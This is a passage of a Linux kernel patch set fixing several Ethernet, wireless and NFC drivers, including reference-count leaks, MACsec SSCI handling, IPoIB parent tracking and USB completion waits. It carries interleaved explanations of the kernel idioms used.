+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct pci_dev *func0_pdev;
++	bool has_mii = false;
+ 
+ 	/* For the C3000 family of SoCs (x550em_a) the internal ixgbe devices
+ 	 * are always downstream of root ports @ 0000:00:16.0 & 0000:00:17.0
+@@ -884,15 +887,16 @@ static bool ixgbe_x550em_a_has_mii(struct ixgbe_hw *hw)
+ 	func0_pdev = ixgbe_get_first_secondary_devfn(PCI_DEVFN(0x16, 0));
+ 	if (func0_pdev) {
+ 		if (func0_pdev == pdev)
+-			return true;
+-		else
+-			return false;
++			has_mii = true;
++		goto out;
+ 	}
+ 	func0_pdev = ixgbe_get_first_secondary_devfn(PCI_DEVFN(0x17, 0));
+ 	if (func0_pdev == pdev)
+-		return true;
++		has_mii = true;
+ 
+-	return false;
++out:
++	pci_dev_put(func0_pdev);
++	return has_mii;
+ }
+ 
+ /**
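pci_get_domain_bus_and_slot() returns its device with an elevated reference count, so every successful lookup needs a matching pci_dev_put(), including paths that merely compare the pointer and move on, which is what the reworked has_mii helper now does via the shared `out:` exit. pci_dev_put() tolerates NULL, which keeps such exits simple:

	static bool devfn_matches(struct pci_dev *mine, unsigned int devfn)
	{
		struct pci_dev *pdev = pci_get_domain_bus_and_slot(0, 0, devfn);
		bool match = (pdev == mine);

		pci_dev_put(pdev);	/* NULL-safe */
		return match;
	}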
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index c8724bfa86b0e..8fdd3afe59981 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -768,9 +768,9 @@ int cgx_lmac_rx_tx_enable(void *cgxd, int lmac_id, bool enable)
+ 
+ 	cfg = cgx_read(cgx, lmac_id, CGXX_CMRX_CFG);
+ 	if (enable)
+-		cfg |= CMR_EN | DATA_PKT_RX_EN | DATA_PKT_TX_EN;
++		cfg |= DATA_PKT_RX_EN | DATA_PKT_TX_EN;
+ 	else
+-		cfg &= ~(CMR_EN | DATA_PKT_RX_EN | DATA_PKT_TX_EN);
++		cfg &= ~(DATA_PKT_RX_EN | DATA_PKT_TX_EN);
+ 	cgx_write(cgx, lmac_id, CGXX_CMRX_CFG, cfg);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+index 0b06788b8d80a..04338db38671b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.h
+@@ -30,7 +30,6 @@
+ #define CMR_P2X_SEL_SHIFT		59ULL
+ #define CMR_P2X_SEL_NIX0		1ULL
+ #define CMR_P2X_SEL_NIX1		2ULL
+-#define CMR_EN				BIT_ULL(55)
+ #define DATA_PKT_TX_EN			BIT_ULL(53)
+ #define DATA_PKT_RX_EN			BIT_ULL(54)
+ #define CGX_LMAC_TYPE_SHIFT		40
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 86653bb8e403a..7f8ffbf79cf74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -758,6 +758,8 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	if (vf->otx2_wq)
+ 		destroy_workqueue(vf->otx2_wq);
+ 	otx2_ptp_destroy(vf);
++	otx2_mcam_flow_del(vf);
++	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index e7a894ba5c3ea..723891eb86eec 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -2177,15 +2177,9 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	cmd->stats = kvcalloc(MLX5_CMD_OP_MAX, sizeof(*cmd->stats), GFP_KERNEL);
+-	if (!cmd->stats)
+-		return -ENOMEM;
+-
+ 	cmd->pool = dma_pool_create("mlx5_cmd", mlx5_core_dma_dev(dev), size, align, 0);
+-	if (!cmd->pool) {
+-		err = -ENOMEM;
+-		goto dma_pool_err;
+-	}
++	if (!cmd->pool)
++		return -ENOMEM;
+ 
+ 	err = alloc_cmd_page(dev, cmd);
+ 	if (err)
+@@ -2269,8 +2263,6 @@ err_free_page:
+ 
+ err_free_pool:
+ 	dma_pool_destroy(cmd->pool);
+-dma_pool_err:
+-	kvfree(cmd->stats);
+ 	return err;
+ }
+ 
+@@ -2283,7 +2275,6 @@ void mlx5_cmd_cleanup(struct mlx5_core_dev *dev)
+ 	destroy_msg_cache(dev);
+ 	free_cmd_page(dev, cmd);
+ 	dma_pool_destroy(cmd->pool);
+-	kvfree(cmd->stats);
+ }
+ 
+ void mlx5_cmd_set_state(struct mlx5_core_dev *dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
+index fd07c4cbfd1d2..1f62c702b6255 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_vxlan.c
+@@ -88,6 +88,8 @@ static int mlx5e_gen_ip_tunnel_header_vxlan(char buf[],
+ 	struct udphdr *udp = (struct udphdr *)(buf);
+ 	struct vxlanhdr *vxh;
+ 
++	if (tun_key->tun_flags & TUNNEL_VXLAN_OPT)
++		return -EOPNOTSUPP;
+ 	vxh = (struct vxlanhdr *)((char *)udp + sizeof(struct udphdr));
+ 	*ip_proto = IPPROTO_UDP;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index f900709639f6e..b92d541b5286e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -62,6 +62,7 @@ struct mlx5e_macsec_sa {
+ 	u32 enc_key_id;
+ 	u32 next_pn;
+ 	sci_t sci;
++	ssci_t ssci;
+ 	salt_t salt;
+ 
+ 	struct rhash_head hash;
+@@ -358,7 +359,6 @@ static int mlx5e_macsec_init_sa(struct macsec_context *ctx,
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 	struct mlx5_macsec_obj_attrs obj_attrs;
+ 	union mlx5e_macsec_rule *macsec_rule;
+-	struct macsec_key *key;
+ 	int err;
+ 
+ 	obj_attrs.next_pn = sa->next_pn;
+@@ -368,13 +368,9 @@ static int mlx5e_macsec_init_sa(struct macsec_context *ctx,
+ 	obj_attrs.aso_pdn = macsec->aso.pdn;
+ 	obj_attrs.epn_state = sa->epn_state;
+ 
+-	key = (is_tx) ? &ctx->sa.tx_sa->key : &ctx->sa.rx_sa->key;
+-
+ 	if (sa->epn_state.epn_enabled) {
+-		obj_attrs.ssci = (is_tx) ? cpu_to_be32((__force u32)ctx->sa.tx_sa->ssci) :
+-					   cpu_to_be32((__force u32)ctx->sa.rx_sa->ssci);
+-
+-		memcpy(&obj_attrs.salt, &key->salt, sizeof(key->salt));
++		obj_attrs.ssci = cpu_to_be32((__force u32)sa->ssci);
++		memcpy(&obj_attrs.salt, &sa->salt, sizeof(sa->salt));
+ 	}
+ 
+ 	obj_attrs.replay_window = ctx->secy->replay_window;
+@@ -499,10 +495,11 @@ mlx5e_macsec_get_macsec_device_context(const struct mlx5e_macsec *macsec,
+ }
+ 
+ static void update_macsec_epn(struct mlx5e_macsec_sa *sa, const struct macsec_key *key,
+-			      const pn_t *next_pn_halves)
++			      const pn_t *next_pn_halves, ssci_t ssci)
+ {
+ 	struct mlx5e_macsec_epn_state *epn_state = &sa->epn_state;
+ 
++	sa->ssci = ssci;
+ 	sa->salt = key->salt;
+ 	epn_state->epn_enabled = 1;
+ 	epn_state->epn_msb = next_pn_halves->upper;
+@@ -550,7 +547,8 @@ static int mlx5e_macsec_add_txsa(struct macsec_context *ctx)
+ 	tx_sa->assoc_num = assoc_num;
+ 
+ 	if (secy->xpn)
+-		update_macsec_epn(tx_sa, &ctx_tx_sa->key, &ctx_tx_sa->next_pn_halves);
++		update_macsec_epn(tx_sa, &ctx_tx_sa->key, &ctx_tx_sa->next_pn_halves,
++				  ctx_tx_sa->ssci);
+ 
+ 	err = mlx5_create_encryption_key(mdev, ctx->sa.key, secy->key_len,
+ 					 MLX5_ACCEL_OBJ_MACSEC_KEY,
+@@ -945,7 +943,8 @@ static int mlx5e_macsec_add_rxsa(struct macsec_context *ctx)
+ 	rx_sa->fs_id = rx_sc->sc_xarray_element->fs_id;
+ 
+ 	if (ctx->secy->xpn)
+-		update_macsec_epn(rx_sa, &ctx_rx_sa->key, &ctx_rx_sa->next_pn_halves);
++		update_macsec_epn(rx_sa, &ctx_rx_sa->key, &ctx_rx_sa->next_pn_halves,
++				  ctx_rx_sa->ssci);
+ 
+ 	err = mlx5_create_encryption_key(mdev, ctx->sa.key, ctx->secy->key_len,
+ 					 MLX5_ACCEL_OBJ_MACSEC_KEY,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 951ede4338132..4dc149ef618c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4071,6 +4071,9 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 	struct mlx5e_vlan_table *vlan;
+ 	struct mlx5e_params *params;
+ 
++	if (!netif_device_present(netdev))
++		return features;
++
+ 	vlan = mlx5e_fs_get_vlan(priv->fs);
+ 	mutex_lock(&priv->state_lock);
+ 	params = &priv->channels.params;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index a61a43fc8d5c5..56d1bd22c7c66 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2300,7 +2300,7 @@ static inline void mlx5i_complete_rx_cqe(struct mlx5e_rq *rq,
+ 
+ 	priv = mlx5i_epriv(netdev);
+ 	tstamp = &priv->tstamp;
+-	stats = rq->stats;
++	stats = &priv->channel_stats[rq->ix]->rq;
+ 
+ 	flags_rqpn = be32_to_cpu(cqe->flags_rqpn);
+ 	g = (flags_rqpn >> 28) & 3;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index bd9936af45827..4c313b7424bf5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1283,7 +1283,6 @@ mlx5e_tc_add_nic_flow(struct mlx5e_priv *priv,
+ 
+ 	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR) {
+ 		err = mlx5e_attach_mod_hdr(priv, flow, parse_attr);
+-		mlx5e_mod_hdr_dealloc(&parse_attr->mod_hdr_acts);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1341,8 +1340,10 @@ static void mlx5e_tc_del_nic_flow(struct mlx5e_priv *priv,
+ 	}
+ 	mutex_unlock(&tc->t_lock);
+ 
+-	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR)
++	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_MOD_HDR) {
++		mlx5e_mod_hdr_dealloc(&attr->parse_attr->mod_hdr_acts);
+ 		mlx5e_detach_mod_hdr(priv, flow);
++	}
+ 
+ 	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_COUNT)
+ 		mlx5_fc_destroy(priv->mdev, attr->counter);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 8c6c9bcb3dc3f..b4e263e8cfb87 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -142,7 +142,7 @@ mlx5_eswitch_set_rule_source_port(struct mlx5_eswitch *esw,
+ 		if (mlx5_esw_indir_table_decap_vport(attr))
+ 			vport = mlx5_esw_indir_table_decap_vport(attr);
+ 
+-		if (attr && !attr->chain && esw_attr->int_port)
++		if (!attr->chain && esw_attr && esw_attr->int_port)
+ 			metadata =
+ 				mlx5e_tc_int_port_get_metadata_for_match(esw_attr->int_port);
+ 		else
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+index c247cca154e9c..eff92dc0927c1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+@@ -90,9 +90,21 @@ static void mlx5i_get_ringparam(struct net_device *dev,
+ static int mlx5i_set_channels(struct net_device *dev,
+ 			      struct ethtool_channels *ch)
+ {
+-	struct mlx5e_priv *priv = mlx5i_epriv(dev);
++	struct mlx5i_priv *ipriv = netdev_priv(dev);
++	struct mlx5e_priv *epriv = mlx5i_epriv(dev);
++
++	/* rtnl lock protects from race between this ethtool op and sub
++	 * interface ndo_init/uninit.
++	 */
++	ASSERT_RTNL();
++	if (ipriv->num_sub_interfaces > 0) {
++		mlx5_core_warn(epriv->mdev,
++			       "can't change number of channels for interfaces with sub interfaces (%u)\n",
++			       ipriv->num_sub_interfaces);
++		return -EINVAL;
++	}
+ 
+-	return mlx5e_ethtool_set_channels(priv, ch);
++	return mlx5e_ethtool_set_channels(epriv, ch);
+ }
+ 
+ static void mlx5i_get_channels(struct net_device *dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 84f5352b0ce19..038ae0fcf9d45 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -160,6 +160,44 @@ void mlx5i_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 	stats->tx_dropped = sstats->tx_queue_dropped;
+ }
+ 
++struct net_device *mlx5i_parent_get(struct net_device *netdev)
++{
++	struct mlx5e_priv *priv = mlx5i_epriv(netdev);
++	struct mlx5i_priv *ipriv, *parent_ipriv;
++	struct net_device *parent_dev;
++	int parent_ifindex;
++
++	ipriv = priv->ppriv;
++
++	parent_ifindex = netdev->netdev_ops->ndo_get_iflink(netdev);
++	parent_dev = dev_get_by_index(dev_net(netdev), parent_ifindex);
++	if (!parent_dev)
++		return NULL;
++
++	parent_ipriv = netdev_priv(parent_dev);
++
++	ASSERT_RTNL();
++	parent_ipriv->num_sub_interfaces++;
++
++	ipriv->parent_dev = parent_dev;
++
++	return parent_dev;
++}
++
++void mlx5i_parent_put(struct net_device *netdev)
++{
++	struct mlx5e_priv *priv = mlx5i_epriv(netdev);
++	struct mlx5i_priv *ipriv, *parent_ipriv;
++
++	ipriv = priv->ppriv;
++	parent_ipriv = netdev_priv(ipriv->parent_dev);
++
++	ASSERT_RTNL();
++	parent_ipriv->num_sub_interfaces--;
++
++	dev_put(ipriv->parent_dev);
++}
++
+ int mlx5i_init_underlay_qp(struct mlx5e_priv *priv)
+ {
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
+index 99d46fda9f82f..f3f2af972020a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.h
+@@ -54,9 +54,11 @@ struct mlx5i_priv {
+ 	struct rdma_netdev rn; /* keep this first */
+ 	u32 qpn;
+ 	bool   sub_interface;
++	u32    num_sub_interfaces;
+ 	u32    qkey;
+ 	u16    pkey_index;
+ 	struct mlx5i_pkey_qpn_ht *qpn_htbl;
++	struct net_device *parent_dev;
+ 	char  *mlx5e_priv[];
+ };
+ 
+@@ -117,5 +119,9 @@ void mlx5i_sq_xmit(struct mlx5e_txqsq *sq, struct sk_buff *skb,
+ 		   struct mlx5_av *av, u32 dqpn, u32 dqkey, bool xmit_more);
+ void mlx5i_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats);
+ 
++/* Reference management for child to parent interfaces. */
++struct net_device *mlx5i_parent_get(struct net_device *netdev);
++void mlx5i_parent_put(struct net_device *netdev);
++
+ #endif /* CONFIG_MLX5_CORE_IPOIB */
+ #endif /* __MLX5E_IPOB_H__ */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
+index 0227a521d301e..0cf4eaf852d2a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib_vlan.c
+@@ -158,21 +158,28 @@ static int mlx5i_pkey_dev_init(struct net_device *dev)
+ 	struct mlx5e_priv *priv = mlx5i_epriv(dev);
+ 	struct mlx5i_priv *ipriv, *parent_ipriv;
+ 	struct net_device *parent_dev;
+-	int parent_ifindex;
+ 
+ 	ipriv = priv->ppriv;
+ 
+-	/* Get QPN to netdevice hash table from parent */
+-	parent_ifindex = dev->netdev_ops->ndo_get_iflink(dev);
+-	parent_dev = dev_get_by_index(dev_net(dev), parent_ifindex);
++	/* Link to parent */
++	parent_dev = mlx5i_parent_get(dev);
+ 	if (!parent_dev) {
+ 		mlx5_core_warn(priv->mdev, "failed to get parent device\n");
+ 		return -EINVAL;
+ 	}
+ 
++	if (dev->num_rx_queues < parent_dev->real_num_rx_queues) {
++		mlx5_core_warn(priv->mdev,
++			       "failed to create child device with rx queues [%d] less than parent's [%d]\n",
++			       dev->num_rx_queues,
++			       parent_dev->real_num_rx_queues);
++		mlx5i_parent_put(dev);
++		return -EINVAL;
++	}
++
++	/* Get QPN to netdevice hash table from parent */
+ 	parent_ipriv = netdev_priv(parent_dev);
+ 	ipriv->qpn_htbl = parent_ipriv->qpn_htbl;
+-	dev_put(parent_dev);
+ 
+ 	return mlx5i_dev_init(dev);
+ }
+@@ -184,6 +191,7 @@ static int mlx5i_pkey_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ static void mlx5i_pkey_dev_cleanup(struct net_device *netdev)
+ {
++	mlx5i_parent_put(netdev);
+ 	return mlx5i_dev_cleanup(netdev);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+index d3a9ae80fd30e..d7ddfc489536e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+@@ -691,7 +691,7 @@ static int mlx5_ptp_verify(struct ptp_clock_info *ptp, unsigned int pin,
+ static const struct ptp_clock_info mlx5_ptp_clock_info = {
+ 	.owner		= THIS_MODULE,
+ 	.name		= "mlx5_ptp",
+-	.max_adj	= 100000000,
++	.max_adj	= 50000000,
+ 	.n_alarm	= 0,
+ 	.n_ext_ts	= 0,
+ 	.n_per_out	= 0,
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index e5a2bbe064f8f..8e368318558ac 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -853,6 +853,9 @@ void lan966x_ptp_deinit(struct lan966x *lan966x)
+ 	struct lan966x_port *port;
+ 	int i;
+ 
++	if (!lan966x->ptp)
++		return;
++
+ 	for (i = 0; i < lan966x->num_phys_ports; i++) {
+ 		port = lan966x->ports[i];
+ 		if (!port)
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index a73d061d9fcb1..fe8dc8e0522b0 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -1996,10 +1996,7 @@ static enum mac_version rtl8169_get_mac_version(u16 xid, bool gmii)
+ 
+ 		/* 8168F family. */
+ 		{ 0x7c8, 0x488,	RTL_GIGA_MAC_VER_38 },
+-		/* It seems this chip version never made it to
+-		 * the wild. Let's disable detection.
+-		 * { 0x7cf, 0x481,	RTL_GIGA_MAC_VER_36 },
+-		 */
++		{ 0x7cf, 0x481,	RTL_GIGA_MAC_VER_36 },
+ 		{ 0x7cf, 0x480,	RTL_GIGA_MAC_VER_35 },
+ 
+ 		/* 8168E family. */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index d42e1afb65213..2f7d8e4561d92 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -90,7 +90,6 @@ struct mediatek_dwmac_plat_data {
+ struct mediatek_dwmac_variant {
+ 	int (*dwmac_set_phy_interface)(struct mediatek_dwmac_plat_data *plat);
+ 	int (*dwmac_set_delay)(struct mediatek_dwmac_plat_data *plat);
+-	void (*dwmac_fix_mac_speed)(void *priv, unsigned int speed);
+ 
+ 	/* clock ids to be requested */
+ 	const char * const *clk_list;
+@@ -443,32 +442,9 @@ static int mt8195_set_delay(struct mediatek_dwmac_plat_data *plat)
+ 	return 0;
+ }
+ 
+-static void mt8195_fix_mac_speed(void *priv, unsigned int speed)
+-{
+-	struct mediatek_dwmac_plat_data *priv_plat = priv;
+-
+-	if ((phy_interface_mode_is_rgmii(priv_plat->phy_mode))) {
+-		/* prefer 2ns fixed delay which is controlled by TXC_PHASE_CTRL,
+-		 * when link speed is 1Gbps with RGMII interface,
+-		 * Fall back to delay macro circuit for 10/100Mbps link speed.
+-		 */
+-		if (speed == SPEED_1000)
+-			regmap_update_bits(priv_plat->peri_regmap,
+-					   MT8195_PERI_ETH_CTRL0,
+-					   MT8195_RGMII_TXC_PHASE_CTRL |
+-					   MT8195_DLY_GTXC_ENABLE |
+-					   MT8195_DLY_GTXC_INV |
+-					   MT8195_DLY_GTXC_STAGES,
+-					   MT8195_RGMII_TXC_PHASE_CTRL);
+-		else
+-			mt8195_set_delay(priv_plat);
+-	}
+-}
+-
+ static const struct mediatek_dwmac_variant mt8195_gmac_variant = {
+ 	.dwmac_set_phy_interface = mt8195_set_interface,
+ 	.dwmac_set_delay = mt8195_set_delay,
+-	.dwmac_fix_mac_speed = mt8195_fix_mac_speed,
+ 	.clk_list = mt8195_dwmac_clk_l,
+ 	.num_clks = ARRAY_SIZE(mt8195_dwmac_clk_l),
+ 	.dma_bit_mask = 35,
+@@ -619,8 +595,6 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+-	if (priv_plat->variant->dwmac_fix_mac_speed)
+-		plat->fix_mac_speed = priv_plat->variant->dwmac_fix_mac_speed;
+ 
+ 	plat->safety_feat_cfg = devm_kzalloc(&pdev->dev,
+ 					     sizeof(*plat->safety_feat_cfg),
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
+index 4d11980dcd64d..9c91a3dc8e385 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
+@@ -219,7 +219,10 @@ static int stmmac_enable(struct ptp_clock_info *ptp,
+ 		}
+ 		writel(acr_value, ptpaddr + PTP_ACR);
+ 		mutex_unlock(&priv->aux_ts_lock);
+-		ret = 0;
++		/* wait for auxts fifo clear to finish */
++		ret = readl_poll_timeout(ptpaddr + PTP_ACR, acr_value,
++					 !(acr_value & PTP_ACR_ATSFC),
++					 10, 10000);
+ 		break;
+ 
+ 	default:
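Instead of returning success immediately after requesting the auxiliary-timestamp FIFO clear, the driver now waits for the self-clearing ATSFC bit using readl_poll_timeout() from <linux/iopoll.h>, which re-reads the register until the condition holds or the timeout expires and returns 0 or -ETIMEDOUT accordingly. The idiom in isolation:

	static int wait_bit_clear(void __iomem *reg, u32 bit)
	{
		u32 val;

		/* poll every 10us, give up after 10ms */
		return readl_poll_timeout(reg, val, !(val & bit), 10, 10000);
	}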
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
+index a83699de01ec3..fdd0c9abc1a10 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
+@@ -79,7 +79,8 @@ void brcmf_of_probe(struct device *dev, enum brcmf_bus_type bus_type,
+ 	/* Apple ARM64 platforms have their own idea of board type, passed in
+ 	 * via the device tree. They also have an antenna SKU parameter
+ 	 */
+-	if (!of_property_read_string(np, "brcm,board-type", &prop))
++	err = of_property_read_string(np, "brcm,board-type", &prop);
++	if (!err)
+ 		settings->board_type = prop;
+ 
+ 	if (!of_property_read_string(np, "apple,antenna-sku", &prop))
+@@ -87,7 +88,7 @@ void brcmf_of_probe(struct device *dev, enum brcmf_bus_type bus_type,
+ 
+ 	/* Set board-type to the first string of the machine compatible prop */
+ 	root = of_find_node_by_path("/");
+-	if (root && !settings->board_type) {
++	if (root && err) {
+ 		char *board_type;
+ 		const char *tmp;
+ 
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index 6f71ac72012ea..ed9c5e2cf3ad4 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -153,10 +153,17 @@ static int pn533_usb_send_ack(struct pn533 *dev, gfp_t flags)
+ 	return usb_submit_urb(phy->ack_urb, flags);
+ }
+ 
++struct pn533_out_arg {
++	struct pn533_usb_phy *phy;
++	struct completion done;
++};
++
+ static int pn533_usb_send_frame(struct pn533 *dev,
+ 				struct sk_buff *out)
+ {
+ 	struct pn533_usb_phy *phy = dev->phy;
++	struct pn533_out_arg arg;
++	void *cntx;
+ 	int rc;
+ 
+ 	if (phy->priv == NULL)
+@@ -168,10 +175,17 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	init_completion(&arg.done);
++	cntx = phy->out_urb->context;
++	phy->out_urb->context = &arg;
++
+ 	rc = usb_submit_urb(phy->out_urb, GFP_KERNEL);
+ 	if (rc)
+ 		return rc;
+ 
++	wait_for_completion(&arg.done);
++	phy->out_urb->context = cntx;
++
+ 	if (dev->protocol_type == PN533_PROTO_REQ_RESP) {
+ 		/* request for response for sent packet directly */
+ 		rc = pn533_submit_urb_for_response(phy, GFP_KERNEL);
+@@ -408,7 +422,31 @@ static int pn533_acr122_poweron_rdr(struct pn533_usb_phy *phy)
+ 	return arg.rc;
+ }
+ 
+-static void pn533_send_complete(struct urb *urb)
++static void pn533_out_complete(struct urb *urb)
++{
++	struct pn533_out_arg *arg = urb->context;
++	struct pn533_usb_phy *phy = arg->phy;
++
++	switch (urb->status) {
++	case 0:
++		break; /* success */
++	case -ECONNRESET:
++	case -ENOENT:
++		dev_dbg(&phy->udev->dev,
++			"The urb has been stopped (status %d)\n",
++			urb->status);
++		break;
++	case -ESHUTDOWN:
++	default:
++		nfc_err(&phy->udev->dev,
++			"Urb failure (status %d)\n",
++			urb->status);
++	}
++
++	complete(&arg->done);
++}
++
++static void pn533_ack_complete(struct urb *urb)
+ {
+ 	struct pn533_usb_phy *phy = urb->context;
+ 
+@@ -496,10 +534,10 @@ static int pn533_usb_probe(struct usb_interface *interface,
+ 
+ 	usb_fill_bulk_urb(phy->out_urb, phy->udev,
+ 			  usb_sndbulkpipe(phy->udev, out_endpoint),
+-			  NULL, 0, pn533_send_complete, phy);
++			  NULL, 0, pn533_out_complete, phy);
+ 	usb_fill_bulk_urb(phy->ack_urb, phy->udev,
+ 			  usb_sndbulkpipe(phy->udev, out_endpoint),
+-			  NULL, 0, pn533_send_complete, phy);
++			  NULL, 0, pn533_ack_complete, phy);
+ 
+ 	switch (id->driver_info) {
+ 	case PN533_DEVICE_STD:
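The pn533 change splits the previously shared URB callback so the data-out path can block until its URB actually completes: the submitter parks a struct holding a completion in urb->context, the new pn533_out_complete() signals it, and the old context pointer is restored afterwards. A skeleton of that shape, with hypothetical names:

	struct out_arg {
		struct completion done;
	};

	static void out_complete(struct urb *urb)
	{
		struct out_arg *arg = urb->context;

		complete(&arg->done);
	}

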